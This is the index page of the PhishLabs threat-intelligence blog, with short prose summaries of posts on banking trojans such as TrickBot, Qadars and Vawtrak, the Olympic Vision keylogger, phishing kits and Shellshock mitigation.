The PhishLabs Blog

From Macro To Mitigation: An Analysis of TrickBot's Lifecycle


Since the identification of TrickBot in late-2016, we have observed it targeting bank customers throughout the United States, United Kingdom, Germany, Australia, and Canada, following an attack pattern similar to the Trojan from which it was developed, Dyre. TrickBot enters into a victims machine and sends bank information to criminals through a complex series of events initiated by one click. Once initiated, TrickBot resides in the background, operating as unobtrusively as possible. While the process, from installation to credential theft, can happen in seconds, TrickBot follows discrete linear steps that provide opportunities for mitigation.

Read More

Topics: Threat Analysis, Threat Intelligence, Banking Trojan, TrickBot

Dissecting the Qadars Banking Trojan

Posted by Raashid Bhat on Feb 22, '17

Qadars is a sophisticated and dangerous trojan used for crimeware-related activities including banking fraud and credential theft. Qadars targets users through exploit kits and is installed using Powershell Scripts. We have observed Qadars targeting multiple well-known banks in UK and Canada and is capable of stealing infected users' two-factor authentication codes and banking credentials through the deployment of webinjects. While not as well known or widespread as other Trojans, the operators have shown commitment to development of Qadars’ on-board evasion techniques and its advanced and adaptable privilege escalation module. This emphasis on persistence alongside the frequent shifts in both industry and geographic targeting indicate Qadars will remain a potent threat through 2017.
Read More

Topics: Threat Analysis, Threat Intelligence, Banking Trojan, Qadars

Vawtrak / Neverquest2 adopts new methods to increase persistence

Posted by King Salemno on Aug 5, '16

At the end of July, the PhishLabs Research, Anaysis, and Intelligence Division (R.A.I.D.) found two major changes in the codebase of Vawtrak (a.k.a. Neverquest2) that significantly increased the banking Trojan’s persistence and the risk it poses for victims. We have discovered that the newest iteration of Vawtrak is now using a domain generation algorithm (DGA) to identify its command and control (C2) server. By using an algorithm instead of hardcoded domains, automated attempts at mitigation are rendered inadequate. Additionally, this new DGA implementation is bundled inside of a codebase that appears smaller and more efficient possibly because of compiler optimization. This optimization prevents malware researchers from using their pre-established Vawtrak analysis techniques during the reversing process to assist with the mitigation of the threat.

Read More

Topics: Threat Analysis, Threat Intelligence, Vawtrak, Banking Trojan, Neverquest2, Malware Analysis, R.A.I.D.

Olympic Vision Keylogger and BEC Scams

Posted by Eris Maelstrom on May 24, '16

During a recent analysis of a business email compromise (BEC) scam, we observed a lure attempting to install the Olympic Vision Keylogger. Further research determined that this keylogger and the accompanying Olympic Vision Crypter were used in a larger campaign, targeting multiple organizations using a variety of different lures, including invoice lures and shipment confirmation lures. This campaign appears to be originating out of South Africa, utilizing both maliciously registered free domains as well as compromised domains.

Read More

Topics: Malware, Threat Analysis, Threat Intelligence, BEC, business email compromise

How to make the most of reported phishing emails... Even if there are way too many

Posted by Joseph Opacki on May 19, '16

You’ve done it.

After months of nagging, security awareness training, and constant reminders, your employees have started reporting phishing emails. Take a moment to pat yourselves on the back, because this is no mean feat.

But… now what? What do you actually do with all these reported emails?

Read More

Topics: Phishing, Threat Analysis, Threat Intelligence, Spear Phishing

Examining a New Cybercrime OPSEC Technique (And How to Break It)

Posted by Jason Davison, Threat Analyst on May 17, '16

The techniques that cybercriminals use are becoming more advanced. They are going to greater lengths to commit fraud, compromise computers, and steal credentials. The time, money, and effort attackers spend crafting attacks makes it important that they protect their work from being stolen by others or give their actions more life by evading technical analysts and investigators.

Read More

Topics: Phishing, Threat Analysis, Strategy

2016 Phishing Trends & Intelligence Report: Hacking the Human

Posted by Joseph Opacki on Feb 25, '16

Today we published the 2016 Phishing Trends & Intelligence Report: Hacking the Human.  We are proud that this report uniquely provides a first-hand, in-depth view of phishing directly from the continuous work PhishLabsTM does to fight back against phishing attacks and the threat actors behind them.

 It was researched and written by our very own PhishLabs R.A.I.D.TM (Research, Analysis, and Intelligence Division), which is made up of some of the world’s most respected threat researchers. The information and analysis in this report came directly from our operations and the technology systems we use to fight back against phishing attacks. We analyzed more than one million confirmed malicious phishing sites in 2015, residing on more than 130,000 unique domains.

Read More

Topics: PhishLabs, General, Threat Analysis, Company News, Phishing Trends and Intelligence Report,

New Phish Kit Backdoor Techniques: "The Dufresne" and "The Vezzini"

The market for pre-made phishing kits is thriving.  Think of a financial institution, email provider, or e-commerce site and someone somewhere has undoubtedly created a pre-packaged collection of the files necessary to create a fictitious site designed to obtain personal and financial information from unsuspecting victims.  These kits are often sold in Dark Web marketplaces or underground hacking forums, but they are also commonly distributed for free on various social media sites.

Read More

Topics: Phishing, Threat Analysis, Phish Kit

Mitigating the Impact of Shellshock on Financial Institutions

With the recent discovery of the Shellshock bug, many banking institutions are left wondering what the implications are to the financial industry and how to begin to secure systems. In this post, we've addressed common questions and mitigation tactics for banking entities to reduce the risk of exploitation through the Shellshock bug vulnerability. 

Read More

Topics: Threat Analysis, Shellshock

Vawtrak Gains Momentum and Expands Targets

Vawtrak is the security industry's name for the latest version the 64-bit compatible Gozi Prinimalka Trojan, a family of malware first conceived in the mid-2000's. Recently, PhishLabs’ R.A.I.D (Research, Analysis, and Intelligence Division) has uncovered new developments in the latest Vawtrak configurations that indicate it is a much more substantial threat than it was a few months ago.

What You Need to Know

Read More

Topics: Malware, Threat Analysis, Threat Intelligence, Trojan, ATO, Vawtrak


What's this all about?

The PhishLabs Blog is where we share our insights and thoughts on cybercrime and online fraud.

Upcoming Events


Posts by Topic

see all